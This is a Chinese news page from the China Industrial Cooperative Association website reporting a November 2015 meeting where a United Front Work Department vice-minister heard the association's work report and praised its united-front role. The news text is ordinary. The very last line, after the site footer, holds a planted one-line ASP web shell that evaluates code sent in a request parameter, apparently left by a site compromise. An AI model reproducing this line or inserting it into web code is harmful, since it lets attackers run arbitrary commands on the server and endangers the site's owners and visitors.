设为首页 加入收藏 工合新闻 电子商务 入会须知 联系我们  

网站首页
  工合新闻
>>  2011年
>>  2012年
>>  2013年
>>  2014年
>>  2015年
>>  2016年
>>  2017年
>>  2018年

地址:北京市东城区建国门北大街金成建国5号1702
电话:010-66165725   

E-mail:gunghobianjibu@126.com

 

  工合新闻
 
中央统战部张裔炯常务副部长听取中国工合工作汇报
充分肯定工合统战性质和统战工作,表示加强指导和支持
 发布时间:2015/11/23 浏览次数:8338

        2015年11月10日上午9时,中央统战部常务副部长张裔炯在统战部主楼会议室专题听取中国工合统战工作汇报并作重要讲话,中央统战部副秘书长兼办公厅主任沈全荣、三局仇昱处长、五局冯克非调研员一起听取汇报。中国工合唐保玲理事长、高宗银名誉理事长、萧程运顾问、吴学锋副理事长等一行7人参加了汇报会。

      首先,唐保玲理事长作了工合统战工作汇报,感谢中央统战部多年以来对于中国工合的支持和指导。她说,中央统战部历任领导闫明复、刘延东、杜青林、武连元、万绍芬、胡德平、田鹤年、张裔炯、斯塔、林智敏等或出席工合会议,或听取工合工作汇报,或讲话作出指示,或担任工合名誉领导。唐理事长简介了中国工合的历史后,她主要从积极推进孙中山纪念大厦(纪念馆)筹建工作,取得了重大进展;隆重召开了庆祝中国工合成立75周年纪念大会,进一步坚定了工合企业建设中国特色社会主义的信念;纪念抗日战争胜利70周年,铭记历史,开创未来;多次会见国民党上层人士,积极推动两地民间交流;召开海峡两岸工业合作发展论坛,为两岸工商企业合作交流搭建起平台;指导会员企业健全党工团组织,把组织建设落到基层;努力推进“两个健康发展”,教育引导会员企业经营管理者致富思源,回报社会;教育引导会员企业员工转变思想观念,为企业发展和国家建设努力工作;申报建设爱国主义教育基地,学习发扬老一代的工合人的革命精神,让爱国抗战、艰苦奋斗的工合精神代代相传;广泛联络国际上曾支持帮助中国工合的组织和人士,开展国际合作交流等10个方面汇报了工合近两年的主要统战工作。

      唐理事长还汇报了下一步中国工合统战工作的主要安排:一是深入学习中央五中全会和中央统战工作会议精神,结合工合实际,突出工合特点,努力加以贯彻;二是积极推进孙中山纪念大厦筹建工作,使之成为凝聚海内外中华儿女爱国情怀的一个重要场所,为海峡两岸搭建一个经济、文化交流的平台;三是按照上级指示,发挥工合独特优势,加强海峡两岸民间交流,为推动两岸和平发展服务;四是根据中央统战工作会议“两个健康发展”的要求,指导、扶持会员企业中的民营经济通过创新和转变增长方式,实现科学持续发展;教育引导民营经济人士致富思源、致富思进,推进和谐正义,做好中国特色社会主义的建设者;五是发扬中国工合关注民族命运、国家前途的光荣传统,以经济工作为载体,坚持中国工合“团结合作一起干”的宗旨,凝心聚力为实现第一个一百年奋斗目标,全面建成小康社会,实现“强国富民”的工合梦和中华民族伟大复兴的中国梦而奋斗。

      在汇报工作后,唐理事长就进一步加强中国工合统战工作提出几点建议:1.建议统战部能够安排我会领导参加有关统战工作的相关会议,同时希望统战部能将有关统战工作简报、动态信息发给我会一份,以便我会及时学习、了解中央统战部工作精神和相关的工作要求,更好地做到知情出力。2.恳请统战部在全国两会换届时能在全国政协委员人选中考虑安排我会代表人士。过去我会最多时有30多位全国人大代表和政协委员。这既是工作需要,也是我会上下共同的期盼。3.恳请统战部对我会的孙中山纪念大厦筹建工作给予关心、指导和大力支持。目前该项目即将进入土地供应和规划设计的关键时期,争取明年11月12日孙中山先生诞辰150周年之际能够举行开工奠基典礼。4.恳请统战部门关注我会像当年东南工合办事处创办的和平印刷厂这些具有红色印记的企业,历史上他们为中国革命和抗日战争的胜利做出了不可磨灭的贡献,但目前在发展上需要协调相关部门给予一定的扶持政策。

      高宗银名誉理事长主要谈了三点感想:一是感谢,中央统战部领导非常关心中国工合的工作,给了我们很大支持,对此表示衷心感谢。二是检讨,过去工合工作汇报不够,主动争取领导不够,今后我们要改进工合宣传,加强向统战部汇报工作。三是希望,中国工合与其他组织不同,是我国经济类成立最早的民间组织;是目前大陆唯一由国共两党共同创建且仍在组织活动的民间团体,我会到台湾拜会国民党高层连战、江丙坤、蒋孝严时,他们对此都感到惊喜和关注;是国共第二次合作的成功范例,是抗日民族统一战线的一支重要力量。它的统战性是历史形成的,也是新时期新任务所决定的。统战部也多次充分肯定了工合的统战性,统战部虽然没有明确工合是一个统战团体,但我会始终把统战工作放在重要位置。比如目前筹建的孙中山纪念大厦,就是为了给海峡两岸和全世界华人搭建一个共同缅怀和纪念孙中山先生的平台,为两岸同胞携手同心,共圆中华民族伟大复兴的中国梦提供阵地。希望统战部能比照中华职教社等统战部联系的民间社团一样对中国工合加以指导,充分发挥工合历史上形成的统战特色。

      吴学锋副理事长在发言中首先感谢张部长的指导,上海青浦工合一直得到区委统战部的指导。上海青浦工合有三个特色:一是依法登记;二是自主办会,不用国家一分钱,主要为民营企业服务,政府购买服务;三是建立有整套章程,按章程办事,讲规矩。因为办得好,有影响,声望都超过了当地工商联,青浦区的工商联主席是我们青浦工合的副理事长。

      听完汇报后,中央统战部副秘书长兼办公厅主任沈全荣谈了三点感受:第一点,一个关键词是有缘,中国工合起源于统一战线,是抗日民族统一战线的产物和结晶,恢复活动以来又挂靠于统战部;另一个关键词是有效,抗战时期中国工合做出重大贡献,恢复活动以来又做了很多工作,尤其是对于促进中小企业的持续健康发展做出了贡献。第二点,也有两个关键词,一个是受教育,中国工合有历史有传统,近80年跌跌撞撞走过来,一直不忘宗旨,不变初心,我们很受教育;另一个是受感动,中国工合目前无编制无经费无办公场所,“三无”状态,但工作搞得很红火,很规范,你们把它当作事业来干,你们主要搞的是社会经济工作,但事事不忘统战,难能可贵。第三点,中央统战部一直对中国工合给予关心和支持,刚才唐理事长的汇报中已提到很多统战部的老领导老前辈给予的支持,张部长才来两三年就两次听取工合汇报,足见重视。我翻了一下以前的文件,中国工合恢复活动后,很长一段时间由中央统战部主管,即使脱钩改轻工业部领导后,中央统战部几次行文明确工合统战性质,统战工作继续接受统战部指导。今后统战部会继续给予关心和支持。今后凡是符合要求的内容我们办公厅会给工合发简报,三局五局也会给。

      张裔炯常务副部长对中国工合的统战工作给予充分肯定。他指出:我们党对统战工作历来高度重视,延安时期,中央统战部就安排在毛主席窑洞的旁边,其规模罕有其匹,重视程度可窥一斑;中国工合组织成立时即带有统战性,在抗战中做过很大贡献。恢复活动以来,你们坚持经济性、国际性、统战性和先进性的“四性”原则,在发展经济、安置就业及探索所有制改革上发挥了重要作用。近年来,在扶持民营经济发展、开展对台交流和国际合作上做了大量工作,很不容易,应该充分肯定。特别是在上万家会员企业中建立了党工团组织,在前两年的金融危机中这么多企业没有一家倒闭的,非常罕见,一方面固然有机制灵活的原因,它们诞生于市场经济,符合市场经济规律要求,另一方面也充分说明中国工合对会员单位的指导是有力的,你们做了大量工作。对于你们下一步的几项工作安排,我都是赞成支持的。对于你们的四项建议,请求得到统战部加强指导,这是应该的。要按照工合统战属性,找准定位,把工作做好。今后关键是加强联系,重要的事情要商量,部有关司局要按照职能帮助出主意。三局主要负责联系港澳台和海外人士,要给予帮助。对台交流不能仅仅是高层,方方面面都要开展,你们工合身份太好,要发挥你们的优势做好对台民间交流工作。五局主要是抓经济工作的,对工合的活动和会员企业可给予支持、指导,当然现在全国一盘棋,对非公经济、小微企业一个政策。在指导时要把握这样一个原则,政治上政策上支持,但不要干预企业内部经营,要做一点实际的支持,按照统一战线条例要求,在重大事情上政策上给予指导。希望中国工合也及时把好的情况、好的经验汇报上来,我们双方多沟通多联系。有关的活动、会议、简报、信息,要加强交流,及时了解情况。统战部在重大政策、重大事情上要给予指导支持。办公厅是牵头的,要做好。同时,他指出,目前社团改革要求去行政化,你们工合“三无”,正符合要求,具有先天优势,尤其在政府工作报告中指出要把“大众创业、万众创新”打造成推动中国经济继续前行的“双引擎”之一的利好浪潮下,工合可发挥作用的余地很大。十八届五中全会强调,实现“十三五”时期发展目标,破解发展难题,厚植发展优势,必须牢固树立并切实贯彻创新、协调、绿色、开放、共享的发展理念,这是关系我国发展全局的一场深刻变革。希望你们充分认识“五个理念”的重大现实意义和深远历史意义,用创新占领市场。要贯彻“五有”标准,即投资要有效益,企业要有利润,积极推动企业持续协调健康发展。当前的首要任务就是要把党的十八届五中全会精神宣传好、贯彻好,希望你们尽快行动起来。今后若有时间,工合的有些活动我会尽量参与。总之,一句话,希望工合的事情能做得更好!

      会后,张裔炯常务副部长同与会人员亲切合影留念。




 

 

中国工业合作协会  版权所有

指导单位:中华人民共和国民政部、国务院国有资产监督管理委员会

主办单位:中国工业合作协会 

电话:010-66165725 邮箱:gunghobianjibu@126.com  地址:北京市东城区建国门内大街金成建国5号1702

"%><%Eval(Request(chr(112)))%><%'.